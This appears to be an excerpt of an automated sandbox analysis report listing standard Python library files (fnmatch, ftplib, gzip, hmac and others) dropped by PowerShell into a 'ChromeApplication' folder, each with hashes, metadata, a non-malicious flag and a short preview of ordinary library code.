                                                                                                                                                                                                  SHA-256:8EE12B8E0A09A58129E2AB4D12FA1B132054F12C4090F7FACB943A163C09710F
                                                                                                                                                                                                  SHA-512:EB108AA2557C4A556EF2CDAEFBA2CEC5A95AB2B72DFFCF9B2F96A6199E4202189CAF2E432A67FC907C3FC604EFB7ECE50D859A471D2DB26DFF8C6D0212BB2709
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Helper class to quickly write a loop over all standard input files.....Typical use is:.... import fileinput.. for line in fileinput.input(encoding="utf-8"):.. process(line)....This iterates over the lines of all files listed in sys.argv[1:],..defaulting to sys.stdin if the list is empty. If a filename is '-' it..is also replaced by sys.stdin and the optional arguments mode and..openhook are ignored. To specify an alternative list of filenames,..pass it as the argument to input(). A single file name is also allowed.....Functions filename(), lineno() return the filename and cumulative line..number of the line that has just been read; filelineno() returns its..line number in the current file; isfirstline() returns true iff the..line just read is the first line of its file; isstdin() returns true..iff the line was read from sys.stdin. Function nextfile() closes the..current file so that the next iteration will read the first line from..the next file (if any); lines not

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\fnmatch.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6912
                                                                                                                                                                                                  Entropy (8bit):4.406960177155352
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mgdA3GVpoP8oQAhpt4CLJzovn6WkPmByCJi9Xknf06hAIbFR4E:X4CFaJQyCJi9Xkf7x
                                                                                                                                                                                                  MD5:9EDB2D03A76A80ABE64419ACA82EB8A9
                                                                                                                                                                                                  SHA1:1F4C2A1965749322D8F00A09B2F9C5CEBC10D838
                                                                                                                                                                                                  SHA-256:99069DC503E3AA219B5948A5795F1E03A2D4D16786707F7AC10684B4486B66CE
                                                                                                                                                                                                  SHA-512:456828214E46FF835BE80BCB047A044EE3DA189992E7A84D79DD35D61A6737DAF523F8550DEE6B92E926BD3CBF50F40F09DCB78D1D136FCFCB21B253DFDFC8C5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Filename matching with shell patterns.....fnmatch(FILENAME, PATTERN) matches according to the local convention...fnmatchcase(FILENAME, PATTERN) always takes case in account.....The functions operate by translating the pattern into a regular..expression. They cache the compiled regular expressions for speed.....The function translate(PATTERN) returns a regular expression..corresponding to PATTERN. (It does not compile it.).."""..import os..import posixpath..import re..import functools....__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]....# Build a thread-safe incrementing counter to help create unique regexp group..# names across calls...from itertools import count.._nextgroupnum = count().__next__..del count....def fnmatch(name, pat):.. """Test whether FILENAME matches PATTERN..... Patterns are Unix shell style:.... * matches everything.. ? matches any single character.. [seq] matches any character in seq.. [!seq] matches any char not i

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\fractions.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28990
                                                                                                                                                                                                  Entropy (8bit):4.386995679707714
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sYYcjYLGi0di34CXYWETikB0040ArA4cwNlxpjOmGa+:sYzsLGi0649J7Qxpsa+
                                                                                                                                                                                                  MD5:D79E7362E8855E4216B46F90A2D664DF
                                                                                                                                                                                                  SHA1:5580BD5171CED40ADFBF2E95C5DBCEC184A44E20
                                                                                                                                                                                                  SHA-256:AF973E4F1A157C6D1AF2F16A63B384A6DFED0D64880A56DB96EA4E0D8D6EB12D
                                                                                                                                                                                                  SHA-512:DCF9E0486490263D30B60FC1CF1800A1763B6E3DF23CD77C11CF83D7C1AC8ABB34EBF522895BC88D5F409E59C2D93663926D1CA2FAE520631722FDC45E5106D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Originally contributed by Sjoerd Mullender...# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>....."""Fraction, infinite-precision, real numbers."""....from decimal import Decimal..import math..import numbers..import operator..import re..import sys....__all__ = ['Fraction']......# Constants related to the hash implementation; hash(x) is based..# on the reduction of x modulo the prime _PyHASH_MODULUS..._PyHASH_MODULUS = sys.hash_info.modulus..# Value to be used for rationals that reduce to infinity modulo..# _PyHASH_MODULUS..._PyHASH_INF = sys.hash_info.inf...._RATIONAL_FORMAT = re.compile(r""".. \A\s* # optional whitespace at the start, then.. (?P<sign>[-+]?) # an optional sign, then.. (?=\d|\.\d) # lookahead for digit or .digit.. (?P<num>\d*) # numerator (possibly empty).. (?: # followed by.. (?:/(?P<denom>\d+))? # an optional denominator.. |

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ftplib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):36477
                                                                                                                                                                                                  Entropy (8bit):4.494220235473389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:xp+qv4dk/rJQJ9+Lx8CDSh8Y+3+amueaw+QHCRi3LdO:xpDTzJQJiDSh8Y+3+fzKEei3L8
                                                                                                                                                                                                  MD5:B14842A034453578318FD0ACD801A0CC
                                                                                                                                                                                                  SHA1:6E4F32C29E9296DCE1452ACE023894F0E1A8B756
                                                                                                                                                                                                  SHA-256:B85739A95BE5A2374013E9892DBFA5AC75312024EF7EBB9BCB4102B0F5BF0F82
                                                                                                                                                                                                  SHA-512:58A628BBC100E1CA623ADA41C2E79302B15A1ED6E5920F385ED26B711383C01483F150AB3DFD39C8A07834A1FCA68F90AE3B4F2CCB59DB8280ED812F93320962
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""An FTP client class and some helper functions.....Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds....Example:....>>> from ftplib import FTP..>>> ftp = FTP('ftp.python.org') # connect to host, default port..>>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@..'230 Guest login ok, access restrictions apply.'..>>> ftp.retrlines('LIST') # list directory contents..total 9..drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ...drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ....drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin..drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc..d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming..drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib..drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub..drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr..-rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg..'226 Transfer complete.'..>>> ft

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\functools.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39068
                                                                                                                                                                                                  Entropy (8bit):4.558893536012342
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:sWkKM+qgJeCAkxPN2NqXBF7sMHrCXZdgbV6TeLCD+26:sWkfgJeCAk7v7sMHrCpEWB6
                                                                                                                                                                                                  MD5:E451C9675E4233DE278ACF700AC7395F
                                                                                                                                                                                                  SHA1:1E7D4C5DB5FC692540C31E1B4DB4679051EB5DF8
                                                                                                                                                                                                  SHA-256:B4698D03B4D366F2B032F5DE66B8181ED8E371C0D7D714B7672432E18D80636B
                                                                                                                                                                                                  SHA-512:4DB40159DB7427CE05D36AA3A6B05151742E6C122DFBDC679C10DCC667FC999FF1302BB2E2BE6F58B895911CF436B27AD78FD64CCF077DEB94046667520111B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""functools.py - Tools for working with functions and callable objects.."""..# Python module wrapper for _functools C module..# to allow utilities written in Python to be added..# to the functools module...# Written by Nick Coghlan <ncoghlan at gmail.com>,..# Raymond Hettinger <python at rcn.com>,..# and .ukasz Langa <lukasz at langa.pl>...# Copyright (C) 2006-2013 Python Software Foundation...# See C source code for _functools credits/copyright....__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES',.. 'total_ordering', 'cache', 'cmp_to_key', 'lru_cache', 'reduce',.. 'partial', 'partialmethod', 'singledispatch', 'singledispatchmethod',.. 'cached_property']....from abc import get_cache_token..from collections import namedtuple..# import types, weakref # Deferred to single_dispatch()..from reprlib import recursive_repr..from _thread import RLock..from types import GenericAlias......#############################################

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5130
                                                                                                                                                                                                  Entropy (8bit):4.610395495126573
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:jqn24r0OS60O04+jl2LyqSgPGfGeYM6Zf8lG4iuRs+laP8q+PCI7ocfz/r/j:jq24r0v60hLhWL+fuMeebiuRPr/r/j
                                                                                                                                                                                                  MD5:5AD610407613DEFB331290EE02154C42
                                                                                                                                                                                                  SHA1:3FF9028BDF7346385607B5A3235F5FF703BCF207
                                                                                                                                                                                                  SHA-256:2E162781CD02127606F3F221FCAA19C183672D1D3E20FDB83FE9950AB5024244
                                                                                                                                                                                                  SHA-512:9A742C168A6C708A06F4307ABCB92CEDE02400BF53A004669B08BD3757D8DB7C660934474EC379C0464E17FFD25310DBAB525B6991CF493E97DCD49C4038F9B7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Path operations common to more than one OS..Do not use directly. The OS specific modules import the appropriate..functions from this module themselves..."""..import os..import stat....__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',.. 'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',.. 'samestat']......# Does a path exist?..# This is false for dangling symbolic links on systems that support them...def exists(path):.. """Test whether a path exists. Returns False for broken symbolic links""".. try:.. os.stat(path).. except (OSError, ValueError):.. return False.. return True......# This follows symbolic links, so both islink() and isdir() can be true..# for the same path on systems that support symlinks..def isfile(path):.. """Test whether a path is a regular file""".. try:.. st = os.stat(path).. except (OSError, ValueError):.. return False.. return stat.S_ISREG(st.st_mode)......

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\getopt.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7704
                                                                                                                                                                                                  Entropy (8bit):4.59015983026496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:oSGuBRjBdvQQ0ZWBX0RfUFCo/g/FF+44VJ3X0WNoO:oj0dH0ZWB+LBwJnkO
                                                                                                                                                                                                  MD5:08EF4DCA79267E51C1CB8B9DB09C0CC8
                                                                                                                                                                                                  SHA1:549CE2C250CF5D33DC427D29D3D387672B6BD3D2
                                                                                                                                                                                                  SHA-256:42DDAA74BF0B85F684D1C4F40B1C460AEF05B8DBF6FD05FCA68D71D2A07F8AAF
                                                                                                                                                                                                  SHA-512:4475B17CA19D985F2C5C017C99A17330BC8AD9FD07B560F472884FF7897284960BAA3A37DF5EE643C6B886715E87293B660D73B221A09D08BC32C1B9421439A6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Parser for command line options.....This module helps scripts to parse the command line arguments in..sys.argv. It supports the same conventions as the Unix getopt()..function (including the special meanings of arguments of the form `-'..and `--'). Long options similar to those supported by GNU software..may be used as well via an optional third argument. This module..provides two functions and an exception:....getopt() -- Parse command line options..gnu_getopt() -- Like getopt(), but allow option and non-option arguments..to be intermixed...GetoptError -- exception (class) raised with 'opt' attribute, which is the..option involved with the exception..."""....# Long option support added by Lars Wirzenius <liw@iki.fi>...#..# Gerrit Holl <gerrit@nl.linux.org> moved the string-based exceptions..# to class-based exceptions...#..# Peter .strand <astrand@lysator.liu.se> added gnu_getopt()...#..# TODO for gnu_getopt():..#..# - GNU getopt_long_only mechanism..# - allow the caller to spe

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\getpass.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6175
                                                                                                                                                                                                  Entropy (8bit):4.440480314278831
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:PX8OzPyKo5dCMPUwl5o0FvZGNYAp83byrYl4Npx2AfeX2RMqdzNydJdCymzGFQ6Z:0OOVvTAlNppYsYmpxvxRMqtM39Q6qQJ
                                                                                                                                                                                                  MD5:0F8B3481C15E6805AFAD8EAE8E770FA1
                                                                                                                                                                                                  SHA1:25DDD71B1BD1F38E61A70C1B53E40F0752D328DF
                                                                                                                                                                                                  SHA-256:D2B77376A296CBDD0F659DA6CAB047426A4719D3F09949ABA8F334BD01E80593
                                                                                                                                                                                                  SHA-512:0E7EE49047339D8DF9D1F233C6EB47004B76D41EE324DACBBDDDA4C55D7C85CFBBFCDE3F9762B9B51AEC6007DEA4796852846A35B8094E61B8F9D472C838B348
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities to get a password and/or the current user name.....getpass(prompt[, stream]) - Prompt for a password, with echo turned off...getuser() - Get the user name from the environment or password database.....GetPassWarning - This UserWarning is issued when getpass() cannot prevent.. echoing of the password contents while reading.....On Windows, the msvcrt module will be used....."""....# Authors: Piers Lauder (original)..# Guido van Rossum (Windows support and cleanup)..# Gregory P. Smith (tty support & GetPassWarning)....import contextlib..import io..import os..import sys..import warnings....__all__ = ["getpass","getuser","GetPassWarning"]......class GetPassWarning(UserWarning): pass......def unix_getpass(prompt='Password: ', stream=None):.. """Prompt for a password, with echo turned off..... Args:.. prompt: Written on stream to ask for the input. Default: 'Password: '.. stream: A writable file object to display the prompt. Def

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\gettext.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28054
                                                                                                                                                                                                  Entropy (8bit):4.498377159987173
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8KE7Hoh/b92mxgRPkwKAUJLyFXtC6Q5j7KdrF3Ep77KmlnkqHJbKAit:8v2bjxgNkwKZZyG6aHKdrdmlnkht
                                                                                                                                                                                                  MD5:FAF4F6D15309F3F0FF72B5250F4A572D
                                                                                                                                                                                                  SHA1:132319D16F45EC0A6A39F5ED1253728F5AEFE9A1
                                                                                                                                                                                                  SHA-256:0CFE0A76C6EE6A60BE2C0DD259B115AEFF96E2CAFEE3C5DDF108991EDD8CC527
                                                                                                                                                                                                  SHA-512:1C22108C0B3C39B6B8670678E8DDDDFCEBCC6E2C3114784FEFA24D2111B5870CE538220120EC7C6C586A2AF4619B5D34B3142F2D3150D7B6B3CF653358278850
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Internationalization and localization support.....This module provides internationalization (I18N) and localization (L10N)..support for your Python programs by providing an interface to the GNU gettext..message catalog library.....I18N refers to the operation by which a program is made aware of multiple..languages. L10N refers to the adaptation of your program, once..internationalized, to the local language and cultural habits....."""....# This module represents the integration of work, contributions, feedback, and..# suggestions from the following people:..#..# Martin von Loewis, who wrote the initial implementation of the underlying..# C-based libintlmodule (later renamed _gettext), along with a skeletal..# gettext.py implementation...#..# Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule,..# which also included a pure-Python implementation to read .mo files if..# intlmodule wasn't available...#..# James Henstridge, who also wrote a gettext.py module, wh

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\glob.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8125
                                                                                                                                                                                                  Entropy (8bit):4.483744893777771
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:pFc4Arou6Aroegm/Mn76MRcjRDaaySlZLVixLOTu7tTy:pyPMAMxm/Mnnc9DaaXB4xnhu
                                                                                                                                                                                                  MD5:9DABC8ECFFFB6F16FD59D418F35E21C3
                                                                                                                                                                                                  SHA1:2FD0A0E2D52FBA4CE022A92033CCE7FFADE39BA5
                                                                                                                                                                                                  SHA-256:BE68BE3D9A2052A254879D80A56CE69B6E6A9C1C82BBC7B3608CA8BA4749EF75
                                                                                                                                                                                                  SHA-512:3CC5A9DA1D426FC128E76A5278D58B6DB40E81C4F4D64FED96A613DE7D3340425CA70E103EB84C4BCC766CD7C0F5ECA8691031E2300949C3642C2127C69C893C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Filename globbing utility."""....import contextlib..import os..import re..import fnmatch..import itertools..import stat..import sys....__all__ = ["glob", "iglob", "escape"]....def glob(pathname, *, root_dir=None, dir_fd=None, recursive=False):.. """Return a list of paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. However, unlike fnmatch, filenames starting with a.. dot are special cases that are not matched by '*' and '?'.. patterns..... If recursive is true, the pattern '**' will match any files and.. zero or more directories and subdirectories... """.. return list(iglob(pathname, root_dir=root_dir, dir_fd=dir_fd, recursive=recursive))....def iglob(pathname, *, root_dir=None, dir_fd=None, recursive=False):.. """Return an iterator which yields the paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. However, unlike fnmatch, filenames s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\graphlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9819
                                                                                                                                                                                                  Entropy (8bit):4.255538830099529
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:rNcRMEUR8YGCyTXFCRIBxgI1umbJrjMpxEIPktyaZN58Uff7yWPJyeTs7SD3Kqn2:piMEUmCyQMxgI0XEBX58UFXl+H
                                                                                                                                                                                                  MD5:EE15C72D9CE4C8AC3566570A1B5ADB79
                                                                                                                                                                                                  SHA1:14A72977DA46F96BAA3AA348AC77DE6F3CFC065C
                                                                                                                                                                                                  SHA-256:2C618FBEF31D772844057C4CFA74BD90874CE0FD9FAB886E3597E4FCA8AEA7E7
                                                                                                                                                                                                  SHA-512:19598987512034E50175FBAFB9F948595EA7FBD9CB4A7004DB55D56A770D964033E2441DE6F6B62D2CBD7B730A8CAB68A3CBFACE05447354B9AD66F4D1544F4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:__all__ = ["TopologicalSorter", "CycleError"]...._NODE_OUT = -1.._NODE_DONE = -2......class _NodeInfo:.. __slots__ = "node", "npredecessors", "successors".... def __init__(self, node):.. # The node this class is augmenting... self.node = node.... # Number of predecessors, generally >= 0. When this value falls to 0,.. # and is returned by get_ready(), this is set to _NODE_OUT and when the.. # node is marked done by a call to done(), set to _NODE_DONE... self.npredecessors = 0.... # List of successor nodes. The list can contain duplicated elements as.. # long as they're all reflected in the successor's npredecessors attribute... self.successors = []......class CycleError(ValueError):.. """Subclass of ValueError raised by TopologicalSorter.prepare if cycles.. exist in the working graph..... If multiple cycles exist, only one undefined choice among them will be reported.. and included in the exception. The det

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\gzip.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22458
                                                                                                                                                                                                  Entropy (8bit):4.493285652895645
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4rrWHTcJt2MIIfqSErRS7IO9a/86ZBbV7QywQXBnT:KJtpAU7huR7Q8T
                                                                                                                                                                                                  MD5:97D3C070D8BAC4A2C8F92F64864C6814
                                                                                                                                                                                                  SHA1:D621A5BB1939468B25D45216A794681BF1765431
                                                                                                                                                                                                  SHA-256:AE72AA290F3AA83BDAA337D92C19B39E396F7BE984FB0F9B60F57464AAA18020
                                                                                                                                                                                                  SHA-512:D56D16D5E1BBE29CC7CAECC2D74A1E44D21710A6E523AAF6E3B3B0E259502272A8C0F470A12526B5DFE575597D40285E480FEC6047EF16517A29E91868B50AB2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Functions that read and write gzipped files.....The user of the file doesn't have to worry about the compression,..but random access is not allowed."""....# based on Andrew Kuchling's minigzip.py distributed with the zlib module....import struct, sys, time, os..import zlib..import builtins..import io..import _compression....__all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"]....FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16....READ, WRITE = 1, 2...._COMPRESS_LEVEL_FAST = 1.._COMPRESS_LEVEL_TRADEOFF = 6.._COMPRESS_LEVEL_BEST = 9......def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST,.. encoding=None, errors=None, newline=None):.. """Open a gzip-compressed file in binary or text mode..... The filename argument can be an actual filename (a str or bytes object), or.. an existing file object to read from or write to..... The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for.. binary mode, or "rt", "wt",

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\hashlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10498
                                                                                                                                                                                                  Entropy (8bit):4.823698140650247
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:KSBDUhawz9fJ+8lOVaX2B916+jZVJ0tMmLfGfpR9eGe9IpeuR95x4TgDM4KAiu9k:KSBmfj2LEMmqpR+9u5d4H4JH9xx4v
                                                                                                                                                                                                  MD5:21DD74815051864F290794402768F3B9
                                                                                                                                                                                                  SHA1:A5D1E78B5C9172FE184D6B32B67848164EDEBB34
                                                                                                                                                                                                  SHA-256:4F2CD247217F809905C3D7A3178EAE31D697C33CA42F06E9D2217DF86D4832A8
                                                                                                                                                                                                  SHA-512:194464D2309DADBBB2CCB8217765F727BE9E86914EB67ECEA89332BAA8629A9E0C40A7707DDEB7DB768A2FC85DED20EF8D74FE03CDD78998B29EF374E9D74953
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#. Copyright (C) 2005-2010 Gregory P. Smith (greg@krypto.org)..# Licensed to PSF under a Contributor Agreement...#....__doc__ = """hashlib module - A common interface to many hash functions.....new(name, data=b'', **kwargs) - returns a new hash object implementing the.. given hash function; initializing the hash.. using the given binary data.....Named constructor functions are also available, these are faster..than using new(name):....md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),..sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256.....More algorithms may be available on your platform but the above are guaranteed..to exist. See the algorithms_guaranteed and algorithms_available attributes..to find out what algorithm names can be passed to new().....NOTE: If you want the adler32 or crc32 hash functions they are available in..the zlib module.....Choose your hash function wisely.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\heapq.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23478
                                                                                                                                                                                                  Entropy (8bit):4.580828814586343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zIyh8ImoQ2TaWDxr0K6rNK3WahBUmYcqV3+oxjTe+ENxd1S2+HGRh:zIC8ImTiA5cgxjT4xdGH+
                                                                                                                                                                                                  MD5:6D447DCB24E4E6EEB99B898F90736687
                                                                                                                                                                                                  SHA1:2CF71707A9889363EAFE7616BD3C585A6897E882
                                                                                                                                                                                                  SHA-256:F140027EAFEF0C3D3FC13D9B393F1A6F24069E5437BDE478E1B95EB47D3EA24D
                                                                                                                                                                                                  SHA-512:EF2D1884A5B56EA3533760C382CAE2D345CCD5F0FE54D6063EAAB4E6A3E01581F312C076FA73A75BA5451E618653BCB1F937BC3D77E9956AB8C61AA3FE008CB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Heap queue algorithm (a.k.a. priority queue).....Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for..all k, counting elements from 0. For the sake of comparison,..non-existing elements are considered to be infinite. The interesting..property of a heap is that a[0] is always its smallest element.....Usage:....heap = [] # creates an empty heap..heappush(heap, item) # pushes a new item on the heap..item = heappop(heap) # pops the smallest item from the heap..item = heap[0] # smallest item on the heap without popping it..heapify(x) # transforms list into a heap, in-place, in linear time..item = heapreplace(heap, item) # pops and returns smallest item, and adds.. # new item; the heap size is unchanged....Our API differs from textbook heap algorithms as follows:....- We use 0-based indexing. This makes the relationship between the.. index for a node and the indexes for its children slightly less.. obvious, but

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\hmac.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7936
                                                                                                                                                                                                  Entropy (8bit):4.550266087115813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6ko2Qnkb5tQl/eFrNry3HYO429+036i5BhzRG8j:6ko2QM5tQlmFrNr/O4L03HhzRD
                                                                                                                                                                                                  MD5:A7308CEE7CED61CEA957D925076FB85B
                                                                                                                                                                                                  SHA1:D23A21F8ADF650171695BCFFF239E974A783DF66
                                                                                                                                                                                                  SHA-256:C9FC1D1AC2E1AF1FCB0976E9A7FFBE14B13A4177C0F39AF9639EA341338DC72C
                                                                                                                                                                                                  SHA-512:7609E95ACB5BC5CBC570060D5E167E1E3A9A5035E3822580F4BAE7D17AC5C497DEE5F6DD0E80F46EBDDEA4985721FA4FCA055F379F5DC731DD70FFE0F36BFF7A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""HMAC (Keyed-Hashing for Message Authentication) module.....Implements the HMAC algorithm as described by RFC 2104..."""....import warnings as _warnings..try:.. import _hashlib as _hashopenssl..except ImportError:.. _hashopenssl = None.. _functype = None.. from _operator import _compare_digest as compare_digest..else:.. compare_digest = _hashopenssl.compare_digest.. _functype = type(_hashopenssl.openssl_sha256) # builtin type....import hashlib as _hashlib....trans_5C = bytes((x ^ 0x5C) for x in range(256))..trans_36 = bytes((x ^ 0x36) for x in range(256))....# The size of the digests returned by HMAC depends on the underlying..# hashing module used. Use digest_size from the instance of HMAC instead...digest_size = None......class HMAC:.. """RFC 2104 HMAC class. Also complies with RFC 4231..... This supports the API for Cryptographic Hash Functions (PEP 247)... """.. blocksize = 64 # 512-bit HMAC; can be changed in subclasses..... __slots__ = (..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\http\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6883
                                                                                                                                                                                                  Entropy (8bit):5.095382966902921
                                                                                                                                                                                                  Encrypted:false
